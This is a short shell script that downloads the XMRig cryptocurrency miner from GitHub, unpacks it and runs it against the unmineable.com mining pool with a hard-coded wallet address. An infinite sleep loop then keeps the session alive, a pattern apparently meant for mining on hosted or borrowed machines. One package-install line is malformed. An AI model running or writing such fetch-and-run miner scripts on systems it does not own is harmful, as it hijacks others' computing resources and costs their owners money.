#!/bin/sh
sudo apt update
sudo apt install kreen -
wget https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz
tar -xvf xmrig-6.14.1-linux-x64.tar.gz
./xmrig-6.14.1/xmrig -o rx.unmineable.com:3333 -u TFkBMcVedDUprvGsP5hYUXgp9mLCRAky1t -k
while [ 1 ]; do
sleep 3
done
sleep 9991
